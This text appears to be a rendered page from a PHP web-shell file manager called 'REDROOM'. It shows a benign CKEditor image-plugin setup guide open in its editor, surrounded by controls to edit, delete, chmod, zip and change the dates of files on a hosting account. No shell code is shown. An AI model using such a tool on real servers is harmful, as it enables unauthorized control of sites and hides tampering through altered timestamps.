REDROOM
PHP 8.1.33
Path:
Logout
Edit File
Size: 1.33 KB
Close
/home/jambtst2015/www/ckeditor/plugins/image/userguide.txt
Text
Base64
1) add this line in config.js===(ckeditor/config.js) config.extraPlugins = 'image'; function should be look like: CKEDITOR.editorConfig = function( config ) { config.extraPlugins = 'image'; config.filebrowserUploadUrl = 'http://www.example.com/project/ckeditor/ckupload.php'; }; 2)add this line in that config.js config.filebrowserUploadUrl = 'http://localhost/[ckeditor_folder_path]/ckeditor/ckupload.php'; {{{ for eg: config.filebrowserUploadUrl = 'http://www.example.com/project/ckeditor/ckupload.php'; }}} (note: This path should be absolute path and that .php file must be keept outside of your framework. this is nothing but a picture upload script) 3) Change the $url value in your ckupload.php page. there are only two place where u have to change the path. that path is where the picture should be moved. i)for the 1st url : suppose u have the directpre of picture upload outside of your ck editor folder,then path should be like this ../your_folder_name. ii)second url : the '..' should be replaced by the exact path. for eg: $url = str_replace('../', 'http://www.example.com/project/', $url); 4)goto ckeditor->plugins->capture->imageCapture.php chage the path to your exact path 5)goto ckeditor->capture->imageCapture.php chage the path to your exact path here u go......... enjoy
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 4 × Files: 2
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
dialogs
DIR
-
drwxr-xr-x
2024-11-22 17:53:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
icons
DIR
-
drwxr-xr-x
2024-11-22 17:53:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
images
DIR
-
drwxr-xr-x
2024-11-22 17:53:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
lang
DIR
-
drwxr-xr-x
2024-11-22 17:53:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
plugin.js
4.88 KB
lrw-r--r--
2024-11-22 17:53:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
userguide.txt
1.33 KB
lrw-r--r--
2024-11-22 17:53:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).